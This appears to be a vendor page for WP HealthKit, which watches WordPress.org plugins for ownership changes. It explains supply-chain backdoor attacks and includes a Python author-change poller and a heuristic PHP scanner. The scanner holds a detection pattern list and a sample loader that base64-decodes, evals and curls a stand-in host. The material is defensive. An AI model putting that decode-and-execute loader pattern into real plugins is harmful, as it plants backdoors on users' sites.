Know when a plugin changes hands — before the backdoor activates
The April 2026 EssentialPlugin attack compromised 30+ plugins purchased on Flippa. Backdoor code sat dormant for 8 months. WP HealthKit monitors plugin author changes on WordPress.org and alerts you the moment ownership shifts.
How supply chain attacks work
The April 2026 EssentialPlugin attack followed a pattern that repeats across every major WordPress supply chain incident. Five steps. Eight months from purchase to payload.
Plugin sold on Flippa or marketplace
A legitimate, trusted plugin is acquired by a new owner. The transaction is public — but no one is watching.
New owner modifies the code
A malicious payload is added, often obfuscated. It passes through standard automated checks because it resembles legitimate code.
Update pushed to WordPress.org
The plugin update looks like any other release. WordPress.org review sees no obvious violation. The update is approved.
Sites auto-update — backdoor is live
Any site with auto-updates enabled, or any site owner who updates manually, now runs the compromised code across their production environment.
Payload activates weeks or months later
In the April 2026 EssentialPlugin attack, backdoor code sat dormant for 8 months before activating against 20,000+ sites simultaneously.
How WP HealthKit detects it
Daily heartbeat sync
The companion plugin syncs your installed plugin inventory with WP HealthKit once per day — plugin slugs, versions, and current author data.
WordPress.org API polling
WP HealthKit queries the WordPress.org plugins API daily for each plugin in your inventory, comparing the current author username against the last known value.
Author change detected
If the author username differs from the last recorded value, an alert fires immediately — in-app notification and email.
Plugin closure detected
If a plugin is removed or closed on WordPress.org (common after a security incident), you are alerted immediately regardless of author data.
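The polling and comparison described above, as an added example that is not WP HealthKit's own code: it reads the public plugin-information endpoint at https://api.wordpress.org/plugins/info/1.2/ and derives the author username from the `author_profile` URL that endpoint returns. The assumptions are that a closed or unknown slug answers with HTTP 404 or an `error` key, and that the installed-plugin list and the stored last-known usernames come from the daily heartbeat; the sample API responses embedded here are constructed, not captured.

```python
"""Detect WordPress.org plugin author changes and closures.

Added example, not WP HealthKit's code. Assumes the public endpoint
https://api.wordpress.org/plugins/info/1.2/ whose response carries
"author_profile" (a profiles.wordpress.org URL whose last path segment is
the username) and that a closed/unknown slug yields HTTP 404 or an "error" key.
"""
import json
import urllib.error
import urllib.parse
import urllib.request
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional

API = "https://api.wordpress.org/plugins/info/1.2/"


@dataclass
class Finding:
    slug: str
    kind: str                # baseline | unchanged | author_changed | closed
    previous: Optional[str]  # last recorded author username
    current: Optional[str]   # username seen on this poll (None when closed)


def username_from_profile(profile_url: str) -> Optional[str]:
    """'https://profiles.wordpress.org/Some-User/' -> 'some-user'."""
    path = urllib.parse.urlparse(profile_url).path.strip("/")
    return path.split("/")[-1].lower() or None


def fetch_plugin_info(slug: str) -> Optional[dict]:
    """Live lookup; returns None when the directory reports the plugin missing/closed."""
    query = urllib.parse.urlencode({"action": "plugin_information", "request[slug]": slug})
    try:
        with urllib.request.urlopen(f"{API}?{query}", timeout=15) as resp:
            data = json.load(resp)
    except urllib.error.HTTPError as exc:
        if exc.code == 404:          # assumed: closed/unknown slug -> 404
            return None
        raise
    return None if "error" in data else data


def check_plugin(slug: str, last_known: Dict[str, Optional[str]],
                 fetch: Callable[[str], Optional[dict]]) -> Finding:
    """Compare today's author username with the stored one; update the store in place."""
    previous = last_known.get(slug)
    info = fetch(slug)
    if info is None:
        # Closure/removal is alerted regardless of author data.
        return Finding(slug, "closed", previous, None)
    current = username_from_profile(info.get("author_profile", ""))
    if previous is None:
        last_known[slug] = current   # first sighting: record baseline, no alert
        return Finding(slug, "baseline", None, current)
    if current != previous:
        last_known[slug] = current   # record the new owner for tomorrow's comparison
        return Finding(slug, "author_changed", previous, current)
    return Finding(slug, "unchanged", previous, current)


def daily_poll(installed: List[str], last_known: Dict[str, Optional[str]],
               fetch: Callable[[str], Optional[dict]] = fetch_plugin_info) -> List[Finding]:
    """One polling pass: `installed` comes from the heartbeat sync, `last_known` from storage."""
    return [check_plugin(slug, last_known, fetch) for slug in installed]


def alerts(findings: List[Finding]) -> List[Finding]:
    """Only author changes and closures should notify the site owner."""
    return [f for f in findings if f.kind in ("author_changed", "closed")]


# Constructed sample responses standing in for live WordPress.org answers.
SAMPLE_RESPONSES = {
    "example-forms": {  # ownership moved: profile now points at a different account
        "slug": "example-forms", "version": "3.1.0",
        "author_profile": "https://profiles.wordpress.org/NewOwner-Acct/",
    },
    "example-seo": {    # unchanged
        "slug": "example-seo", "version": "2.0.4",
        "author_profile": "https://profiles.wordpress.org/seo-dev/",
    },
    # "example-gallery" is absent on purpose: the directory reports it not found (closed).
}


def sample_fetch(slug: str) -> Optional[dict]:
    return SAMPLE_RESPONSES.get(slug)


if __name__ == "__main__":
    installed = ["example-forms", "example-seo", "example-gallery"]
    stored = {"example-forms": "oldmaintainer", "example-seo": "seo-dev",
              "example-gallery": "gallery-dev"}
    for f in alerts(daily_poll(installed, stored, sample_fetch)):
        print(f"ALERT {f.kind}: {f.slug} {f.previous} -> {f.current}")
```

The comparison is on the lowercased profile username rather than the display name in the `author` field, because display names are free text and change legitimately; swapping `sample_fetch` for `fetch_plugin_info` turns the same loop into a live daily job.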
What you see in the dashboard
Every connected site has a Supply Chain panel showing the author status of each installed plugin. Green when all clear. Orange with detail when something changes.
- Plugin name and current installation count
- Previous author username and new author username
- Date the change was detected
- Direct link to the plugin changelog on WordPress.org
What to do when you get an alert
An author change is a signal to investigate — not necessarily a confirmation of compromise. Here is the recommended response flow.
Review the changelog
Open the plugin changelog on WordPress.org. Look for unexplained file additions or vague release notes.
Check recent commits
If the plugin has a public SVN log, scan recent commits for obfuscated code, base64 strings, or external curl calls.
Assess the risk
Not every ownership change is malicious. Legitimate acquisitions happen. Use context: is this a reputable buyer or an anonymous account?
Deactivate if suspicious
WP HealthKit does not remove plugins automatically. If you see suspicious code, deactivate and remove before any payload can activate.
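A first-pass triage of the plugin source after an alert, as an added example rather than anything WP HealthKit ships: it walks a checked-out copy of the plugin (for instance an export of its WordPress.org SVN trunk) and flags the things the steps above tell you to look for, base64 blobs, obfuscated or dynamically executed code, and outbound curl calls. The indicator list and weights are assumed heuristics to order a human review, not a malware signature set, and the two PHP files embedded below are constructed samples.

```python
"""Heuristic triage of plugin source after an author-change alert.

Added example, not WP HealthKit's code. INDICATORS is an assumed starting set
for a manual review (base64 blobs, obfuscation, outbound curl); every hit still
needs a person to read the surrounding code before deciding to deactivate.
"""
import os
import re
from dataclasses import dataclass
from typing import List

# (name, weight, pattern). Weights are assumed and only rank the review queue.
INDICATORS = [
    ("eval",                 5, re.compile(r"\beval\s*\(")),
    ("create_function",      4, re.compile(r"\bcreate_function\s*\(")),
    ("base64_decode",        3, re.compile(r"\bbase64_decode\s*\(")),
    ("decoder_chain",        3, re.compile(r"\b(?:gzinflate|gzuncompress|str_rot13)\s*\(")),
    ("long_base64_literal",  3, re.compile("[\"'][A-Za-z0-9+/]{80,}={0,2}[\"']")),
    ("hex_escaped_string",   2, re.compile(r"(?:\\x[0-9a-fA-F]{2}){6,}")),
    ("curl",                 2, re.compile(r"\bcurl_(?:init|exec|setopt)\s*\(")),
    ("hardcoded_remote_url", 2, re.compile(
        r"\b(?:file_get_contents|wp_remote_(?:get|post)|curl_init)\s*\(\s*[\"']https?://")),
]


@dataclass
class Hit:
    path: str
    line: int
    indicator: str
    weight: int
    snippet: str


def scan_source(path: str, source: str) -> List[Hit]:
    """Return one Hit per (line, indicator) match in a single PHP source text."""
    hits: List[Hit] = []
    for lineno, text in enumerate(source.splitlines(), 1):
        for name, weight, pattern in INDICATORS:
            if pattern.search(text):
                hits.append(Hit(path, lineno, name, weight, text.strip()[:120]))
    return hits


def risk_score(hits: List[Hit]) -> int:
    """Sum each distinct (file, indicator) weight once so a long file cannot inflate itself."""
    distinct = {(h.path, h.indicator): h.weight for h in hits}
    return sum(distinct.values())


def scan_plugin_dir(root: str) -> List[Hit]:
    """Walk a checked-out plugin tree and scan every .php file, highest-risk files first."""
    hits: List[Hit] = []
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if fn.lower().endswith(".php"):
                full = os.path.join(dirpath, fn)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    hits.extend(scan_source(os.path.relpath(full, root), fh.read()))
    return sorted(hits, key=lambda h: (-h.weight, h.path, h.line))


# Constructed samples: an ordinary shortcode plugin and a release carrying a loader.
BENIGN_PHP = """<?php
/* Plugin Name: Example Forms */
add_action('init', 'ef_register_shortcode');
function ef_register_shortcode() {
    add_shortcode('example_form', 'ef_render');
}
function ef_render($atts) {
    return '<form method="post">' . wp_nonce_field('ef', 'ef_n', true, false) . '</form>';
}
"""

SUSPICIOUS_PHP = """<?php
add_action('init', 'ef_maybe_update');
function ef_maybe_update() {
    $b = "%s";
    $p = base64_decode($b);
    eval($p);
    $ch = curl_init("http://update.example.invalid/p.txt");
    curl_exec($ch);
}
""" % ("QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo" * 3)


if __name__ == "__main__":
    for name, src in (("benign.php", BENIGN_PHP), ("suspicious.php", SUSPICIOUS_PHP)):
        hits = scan_source(name, src)
        print(f"{name}: score {risk_score(hits)}")
        for h in hits:
            print(f"  L{h.line} {h.indicator}: {h.snippet}")
```

Run `scan_plugin_dir("path/to/plugin-export")` against the new release and the last release you trusted and diff the two hit lists; indicators that appear only in the post-sale version are the lines to read first.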
Honest limitations
- Only detects changes on WordPress.org. Private and commercial plugins have no public API and cannot be monitored.
- Detects author changes, not necessarily malicious changes. False positives are possible when plugins are legitimately acquired.
- Requires the WP HealthKit companion plugin to be installed and connected to your site.
- Daily polling means a short window exists between a change being made and detection.
Connect your first site and enable supply chain monitoring
The companion plugin takes two minutes to install. Author change alerts are on by default.